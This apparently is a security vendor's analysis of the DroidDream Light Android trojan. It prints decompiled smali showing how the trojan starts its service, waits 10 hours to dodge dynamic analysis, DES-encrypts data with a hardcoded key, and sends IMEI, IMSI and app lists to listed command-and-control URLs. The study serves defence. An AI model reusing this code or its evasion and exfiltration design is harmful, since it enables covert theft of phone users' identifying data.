Days ago, Lookout release an article in their blog about the new discovered Android malware created by the same writer who uploaded the "Droid Dream" malware disclosed in this March. AegisLab also investigate the samples in our hand, and compose the following analysis. [We use the sample named "Quick Cleaner" as the example].

     The DroidDream Light repackages popular applications with its malicious code (com.passionteam.lightdd), called "ddlight" for short as below. "ddlight" adds a reveiver and a service to execute its malicious code to collect information of user's mobile devices, and then send to remote server.

        <receiver android:name="com.passionteam.lightdd.Receiver">
            <intent-filter>
                <action android:name="android.intent.action.PHONE_STATE" />
                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </receiver>
        <service android:name="com.passionteam.lightdd.CoreService" />


    To activate its code and collect privileged user data, it nedds additional permission as below.

  <uses-permission android:name="android.permission.INTERNET" />
      <uses-permission android:name="android.permission.READ_PHONE_STATE" />


   "ddlight" starts CoreService to collect user privileged information when user starts the re-packaged application, or a phone call comes. However, ddlight doesn't start run its malicious codes directly, it uses a timer to wait 10 hours, then send data continuously at a peroids of times in around 2 hours.


     The first method :  cn/com/opda/android/clearmaster/MainTabActivity.smali (Modify entry point of application)

 970 .method protected onCreate(Landroid/os/Bundle;)V
 971     .locals 7
 972     .parameter "savedInstanceState"
 973
 974     .prologue
 975     .line 49
 976     invoke-super {p0, p1}, Landroid/app/TabActivity;->onCreate(Landroid/os/Bundle;)V
 977
 978     new-instance v0, Landroid/content/Intent;
 979
 980     const-class v1, Lcom/passionteam/lightdd/CoreService;
 981
 982     invoke-direct {v0, p0, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
 983
 984     invoke-virtual {p0, v0}, Lcn/com/opda/android/clearmaster/MainTabActivity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
 985
 986     .line 50
 987     invoke-static {p0}, Lcom/mobclick/android/MobclickAgent;->onError(Landroid/content/Context;)V
 988


    The second method: com/passionteam/lightdd/Receiver.smali (When a phone call comes)

19 # virtual methods
 20 .method public onReceive(Landroid/content/Context;Landroid/content/Intent;)V
 21     .locals 4
 22
 23     iput-object p1, p0, Lcom/passionteam/lightdd/Receiver;->a:Landroid/content/Context;
 24
 25     invoke-virtual {p2}, Landroid/content/Intent;->getAction()Ljava/lang/String;
 26
 27     move-result-object v0
 28
 29     const-string v1, "android.intent.action.PHONE_STATE"
 30
 31     invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
 32
 33     move-result v0
 34
 35     if-eqz v0, :cond_0
 36
 37     iget-object v0, p0, Lcom/passionteam/lightdd/Receiver;->a:Landroid/content/Context;
 38
 39     new-instance v1, Landroid/content/Intent;
 40
 41     iget-object v2, p0, Lcom/passionteam/lightdd/Receiver;->a:Landroid/content/Context;
 42
 43     const-class v3, Lcom/passionteam/lightdd/CoreService;
 44
 45     invoke-direct {v1, v2, v3}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
 46
 47     invoke-virtual {v0, v1}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
 48
 49     :cond_0
 50     return-void
 51 .end method                                                                                              




    com/passionteam/lightdd/CoreService.smali, CoreService set a timer to run its codes, it tries to make it difficult to detect from dynamic analysis.

# direct methods
.method public constructor <init>()V
    .locals 1

    invoke-direct {p0}, Landroid/app/Service;-><init>()V

    new-instance v0, Lcom/passionteam/lightdd/d;

    invoke-direct {v0, p0}, Lcom/passionteam/lightdd/d;-><init>(Lcom/passionteam/lightdd/CoreService;)V

    iput-object v0, p0, Lcom/passionteam/lightdd/CoreService;->a:Landroid/os/Handler;

# TimerTask subclass
    new-instance v0, Lcom/passionteam/lightdd/a;

    invoke-direct {v0, p0}, Lcom/passionteam/lightdd/a;-><init>(Lcom/passionteam/lightdd/CoreService;)V

    iput-object v0, p0, Lcom/passionteam/lightdd/CoreService;->i:Ljava/util/TimerTask;

    return-void
.end method

.method public onCreate()V
      ...
      invoke-direct {v0}, Ljava/util/Timer;-><init>()V
 
      iget-object v1, p0, Lcom/passionteam/lightdd/CoreService;->i:Ljava/util/TimerTask;
 
      const/16 v2, 0xa
  #dealy time: 36000,000 = 10 hours
      invoke-static {v6, v2}, Lcom/passionteam/lightdd/g;->a(II)J
 
      move-result-wide v2
 
      const/4 v4, 0x2
 
  #period time: 7200,000 = 2 hours
      invoke-static {v4, v6}, Lcom/passionteam/lightdd/g;->a(II)J
 
      move-result-wide v4
 
      invoke-virtual/range {v0 .. v5}, Ljava/util/Timer;->schedule(Ljava/util/TimerTask;JJ)V

      ...


   com/passionteam/lightdd/c.smali, all its data are encrypted by DES as below.

.method public static a([B)[B
    .locals 4

    const-string v3, "DES"

    new-instance v0, Ljava/security/SecureRandom;

    invoke-direct {v0}, Ljava/security/SecureRandom;-><init>()V

    new-instance v1, Ljavax/crypto/spec/DESKeySpec;
# DES key
    const-string v2, "DDH#X%LT"

    invoke-virtual {v2}, Ljava/lang/String;->getBytes()[B

    move-result-object v2

    invoke-direct {v1, v2}, Ljavax/crypto/spec/DESKeySpec;-><init>([B)V

    const-string v2, "DES"

    invoke-static {v3}, Ljavax/crypto/SecretKeyFactory;->getInstance(Ljava/lang/String;)Ljavax/crypto/SecretKeyFactory;

    move-result-object v2

    invoke-virtual {v2, v1}, Ljavax/crypto/SecretKeyFactory;->generateSecret(Ljava/security/spec/KeySpec;)Ljavax/crypto/SecretKey;

    move-result-object v1

    const-string v2, "DES"

    invoke-static {v3}, Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;


   "ddlight" has a resource data "prefer.dat" recording all web sites that it will randomly connect to send encrypted data.

Encrypted
0000000: dc8d 5f0c 07d7 9d09 6335 7e32 3f3f 163f  .._.....c5~2??.?   
0000010: 373f 3f3f 3f3f 3f7a 0d3f 3f6c 3f56 573f  7??????z.??l?VW?
0000020: 3f3f 3f3f 3f49 463f 7143 773f 3f3f 3f00  ?????IF?qCw????.
0000030: 3f44 743f 3fc7 a13f 483f 6137 3f1f 7775  ?Dt??..?H?a7?.wu
0000040: 553f 3f77 3f34 3f04 c0a3 1e3f 713f 42de  U??w?4?....?q?B.
0000050: a005 6c3f 3f60 0558 3a3f ef9a 973f 2f3f  ..l??`.X:?...?/?
0000060: 763f 683f 7c44 3f3f 3f3f 3f0e 243f 3f3f  v?h?|D?????.$???
0000070: 0a      
After encryption:
FeedProxy2=http://ju5o.com/zpmq.jsp
FeedProxy2=http://mlo6.com/owxnf.jsp
FeedProxy2=http://ya3k.com/bksy.jsp


    Privileged information of infected mobile will be transfered as an encrypted XML format with DES key "DDH#X%LT". The plain text data shown as below, and we replace each element with Android system API if it is not hardcode for better understanding.

<?xml version="1.0" encoding="UTF-8"?>
<Request>
    <Protocol>2.0</Protocol>
    <Command>2</Command>
    <MobileInfo>
        <Model>Landroid/os/Build;->DEVICE</Model>
        <Language>Ljava/util/Locale;->getDefault();->getLanguage()</Language>
        <Country>Ljava/util/Locale;->getDefault();->getCountry()</Country>
        <IMEI>Landroid/telephony/TelephonyManager;->getDeviceId()</IMEI>
        <IMSI>Landroid/telephony/TelephonyManager;->getSubscriberId()</IMSI>
    </MobileInfo>
    <ClientInfo>
        <PlatformID>5</PlatformID>
        <OSVersion>Landroid/os/Build$VERSION;->SDK_INT</OSVersion>
        <Edition>Landroid/content/pm/PackageInfo;->versionCode</Edition>
        <ProductID>1105201</ProductID>
        <SubCoopID>1100800101</SubCoopID>
        <PackageName>Landroid/content/Context;->getPackageName()</PackageName>
    </ClientInfo>
    <InstalledProductInfo>
        <Product name="Landroid/content/pm/ApplicationInfo;->loadLabel(...)" package="Landroid/content/pm/PackageInfo;->packageName" ver="Landroid/content/pm/PackageInfo;->versionCode" />
        ...
    </InstalledProductInfo>
</Request>

By AegisLab